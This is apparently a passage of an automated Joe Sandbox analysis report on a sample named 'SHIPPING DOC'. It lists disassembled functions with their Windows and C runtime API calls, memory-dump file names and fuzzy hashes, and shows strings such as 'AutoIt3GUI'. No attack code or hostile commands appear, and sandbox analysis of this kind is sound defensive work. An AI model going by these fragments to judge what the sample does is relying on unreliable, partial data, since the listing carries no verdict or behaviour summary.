                                                                                                                      • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1187119602-0
                                                                                                                      • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                      • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                      • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                      • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1597257046-0
                                                                                                                      • Opcode ID: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                                                                                                                      • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                      • Opcode Fuzzy Hash: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                                                                                                                      • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                      APIs
                                                                                                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 237123855-0
                                                                                                                      • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                      • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                      • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                      • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyObject$IconWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3349847261-0
                                                                                                                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2223660684-0
                                                                                                                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                      • EndPath.GDI32(?), ref: 00447336
                                                                                                                      • StrokePath.GDI32(?), ref: 00447344
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2783949968-0
                                                                                                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2710830443-0
                                                                                                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                      • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                      • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                      • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                      • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                      • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                      • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                      • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                      • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                      • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                      • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                      • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                      APIs
                                                                                                                      • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                      • __freeptd.LIBCMT ref: 0041516B
                                                                                                                      • ExitThread.KERNEL32 ref: 00415173
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1454798553-0
                                                                                                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncmp
                                                                                                                      • String ID: Q\E
                                                                                                                      • API String ID: 909875538-2189900498
                                                                                                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                      • API String ID: 2652923123-3941886329
                                                                                                                      • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                                                                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                      • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                                                                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove_strncmp
                                                                                                                      • String ID: U$\
                                                                                                                      • API String ID: 2666721431-100911408
